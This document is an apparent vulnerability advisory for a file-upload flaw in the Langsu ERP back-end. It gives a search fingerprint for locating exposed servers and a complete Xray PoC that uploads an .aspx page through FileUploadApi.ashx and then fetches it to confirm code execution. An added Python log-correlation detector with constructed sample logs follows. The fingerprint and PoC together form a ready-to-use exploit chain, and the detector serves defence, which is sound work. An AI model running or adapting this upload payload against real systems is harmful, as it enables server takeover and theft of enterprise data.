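File upload vulnerability in FileUploadApi of the Langsu ERP (朗速ERP) back-end management system
Vulnerability details reference: https://mp.weixin.qq.com/s/nMRnxBicTEiKJtfT0R3wQA
Vulnerability description:
Langsu ERP is a powerful enterprise resource planning (ERP) software package built for small and medium-sized enterprises, intended to help them optimize management processes and improve operational efficiency. It is used not only in manufacturing but also widely in retail, logistics, services and other industries. The FileUploadApi interface file in the Langsu ERP back-end management system has a file upload vulnerability: an attacker can exploit it to upload malicious files and then take control of the server or steal sensitive enterprise information.
Asset fingerprint: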
body="/Resource/Scripts/Yw/Yw_Bootstrap.js"
Xray-poc:
name: poc-yaml-lum-soft-fileuploadapi-fileupload
manual: true
set:
  randint: randomInt(1000000, 9999999)
  rboundary: randomLowercase(16)
  randname: randomLowercase(6)
transport: http
rules:
  r0:
    request:
      cache: true
      method: POST
      path: /Api/FileUploadApi.ashx?method=DoWebUpload
      headers:
        Content-Type: multipart/form-data; boundary=----WebKitFormBoundary{{rboundary}}
      body: "------WebKitFormBoundary{{rboundary}}\r\nContent-Disposition: form-data; name=\"file\";filename=\"{{randname}}.aspx\"\r\n\r\n<%@ Page Language=\"C#\"%><% Response.Write(\"{{randint}}\");System.IO.File.Delete(Server.MapPath(Request.Url.AbsolutePath)); %>\r\n------WebKitFormBoundary{{rboundary}}--"
    expression: response.status == 200 && response.body_string.contains("WebRelPath")
    output:
      search: '"WebRelPath\":\"(?P<uploadfile>.+?).aspx\",".bsubmatch(response.body)'
      uploadfile: search["uploadfile"]
  r1:
    request:
      cache: true
      method: GET
      path: /{{uploadfile}}.aspx
    expression: response.status == 200 && response.body_string.contains(string(randint))
expression: r0() && r1()
detail:
  author: cysec
  links:
    - https://mp.weixin.qq.com/s/nMRnxBicTEiKJtfT0R3wQA
  description: 朗速ERP后台管理系统FileUploadApi存在文件上传漏洞
  fofakeyword: body="/Resource/Scripts/Yw/Yw_Bootstrap.js"
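For detection, the two requests in the PoC above leave a recognizable pair in IIS access logs even though the test page deletes itself after running. The following is an added example, not part of the original advisory or the vendor's code: it correlates a POST to the upload endpoint with a first-time request for an .aspx page by the same client. The W3C field layout, the 10-minute window and every sample log line (including the upload path) are constructed assumptions.

```python
# Added example: flag the upload-then-fetch pattern in IIS W3C logs.
from datetime import datetime, timedelta

UPLOAD_STEM = "/api/fileuploadapi.ashx"   # endpoint named in the PoC
UPLOAD_QUERY = "method=dowebupload"
WINDOW = timedelta(minutes=10)            # assumed correlation window

# Constructed sample log (not real traffic); paths and IPs are placeholders.
SAMPLE_LOG = """\
#Fields: date time cs-method cs-uri-stem cs-uri-query c-ip sc-status
2024-05-01 10:00:01 GET /Login.aspx - 198.51.100.7 200
2024-05-01 10:02:10 POST /Api/FileUploadApi.ashx method=DoWebUpload 203.0.113.9 200
2024-05-01 10:02:11 GET /Upload/2024/abcdef.aspx - 203.0.113.9 200
2024-05-01 10:05:00 GET /Login.aspx - 203.0.113.9 200
2024-05-01 11:00:00 POST /Api/FileUploadApi.ashx method=DoWebUpload 198.51.100.7 200
"""

def parse(log_text):
    """Yield one dict per request, using the #Fields directive for column names."""
    fields = []
    for line in log_text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#") and fields:
            row = dict(zip(fields, line.split()))
            row["ts"] = datetime.strptime(row["date"] + " " + row["time"],
                                          "%Y-%m-%d %H:%M:%S")
            yield row

def find_upload_then_fetch(log_text):
    """Return (client_ip, upload_time, fetched_path) for each .aspx path first
    requested by a client shortly after that client POSTed to the upload API."""
    seen_paths, uploads, hits = set(), {}, []
    for r in parse(log_text):
        stem, ip = r["cs-uri-stem"].lower(), r["c-ip"]
        if (r["cs-method"] == "POST" and stem == UPLOAD_STEM
                and UPLOAD_QUERY in r["cs-uri-query"].lower()):
            uploads[ip] = r["ts"]
        elif (stem.endswith(".aspx") and stem not in seen_paths
                and ip in uploads and r["ts"] - uploads[ip] <= WINDOW):
            hits.append((ip, uploads[ip], r["cs-uri-stem"]))
        seen_paths.add(stem)
    return hits

if __name__ == "__main__":
    for ip, ts, path in find_upload_then_fetch(SAMPLE_LOG):
        print(f"{ts} {ip} uploaded, then fetched new page {path}")
```

Pages that were requested before any upload (such as the login page in the sample) are not flagged, which keeps ordinary navigation after a legitimate upload out of the results.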